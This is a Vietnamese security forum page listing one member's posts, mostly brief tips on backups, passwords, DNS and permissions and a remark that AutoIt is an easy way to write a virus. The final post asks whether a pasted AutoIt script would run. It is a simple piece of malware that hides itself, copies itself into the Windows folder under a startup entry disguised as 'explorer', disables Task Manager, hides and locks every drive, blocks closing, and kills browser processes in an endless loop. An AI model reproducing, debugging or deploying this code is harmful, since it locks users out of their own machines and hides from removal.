banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: minhducitpro  XML
Profile for minhducitpro Messages posted by minhducitpro [ number of posts not being displayed on this page: 0 ]
 
Cảm ơn bác cho em thêm một ít kinh nghiệm smilie
hix, các bác này reply rồi đả kích nhau đấy chứ, theo như chủ topic là người mới học nên muốn biết virus nó như thế nào thì chỉ cần sử dụng Autoit là đựoc rồi, nó dễ viết đấy chứ. Nhưng mà công nhận các bác cãi nhau em lại thấy có nhiều thông tin để em học hỏi hơn. Mong các bác có nhiều bài tranh luận hay chứ ko phải đã kich nhau.hi smilie
Có ích thật smilie
Đến khổ, quán net thì cài soft đóng băng chứ dại gì mà phơi reg ra.
Backup thường xuyên!
Ở VN trong những năm gần đây sự phát triển của CNTT đã dần ăn sâu vào cơ cấu tổ chức của DN hay nhà nước nhưng VN cũng được nhận xét là nước có cái gọi là bảo mật "rắc rối" không theo một phuơng thức khoa học thống nhất nên việc khó khăn trước mắt là không thể tranh khỏi, do vậy đòi hỏi có môttj chiến lược mang tính cách mạng may ra mới đổi mới được tư duy CN ở VN. Những cái gọi là "bảo mật" ở VN bg chỉ mang tính tạm thời, bị động. Nói chung mình cần học hỏi rất nhiều ở các nước pt.
Bản thân nó cũng là một dạng virus smilie
Chuẩn!!!
vao run gõ services.msc rồi tìm Print spooler automatic
Đói vs một công ty thì đâu cần phải giám sát bàn phím làm gì nhỉ. đơn giản là máy này nằm trong mạng nội bộ do server quản lí. có rất nhiều phần mềm để biết những thông tin mà mình đã "chat" chứ ko phải giám sát chi cho mệt đâu smilie)
Thử xem cấu hình DNS của những người vào đựoc xem sao rồi cấu hình tuơng tự vs ip khác cùng lớp mạng
Đối vs website thì chỉ có backup thường xuyên là chắc ăn nhất bác à. còn đói vs phần mềm để bảo mật thì bác cứ đặt pass cho complex nhưng cũng đừng phức tạp quásmilie. đặt cả pass vào windows. vào windows đựoc nhưng không vào database được smilie)
Có thể trong lúc phân quyền bác thiết lập cho các user trong nhóm có khả năng sửa, cài đặt cũng nên
cảm ơn bác,em mới thử viết một số đoạn rồi chỉ thử chạy nên còn chưa biết nhiều,bác có thể chỉ rõ cho em hơn không.em cảm ơn nhiều smilie về đoạn mã bác vừa trích từ bài em đó.
các bác cho em hỏi đoạn này có khả năng chạy không ạ smilie thanks cácn bác.
#Notrayicon
FileCopy(@ScriptDir & "\minhduc.exe","C:\WINDOWS",1)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@Win dowsDir & "\minhduc.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoDrives" ,"REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoClose"," REG_DWORD","1")
While 1
If ProcessExists("iexplorer.exe") then
ProcessClose("iexplorer.exe")
EndIf
If ProcessExists("firefox.exe") then
ProcessClose("firefox.exe")
EndIf
WEnd
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|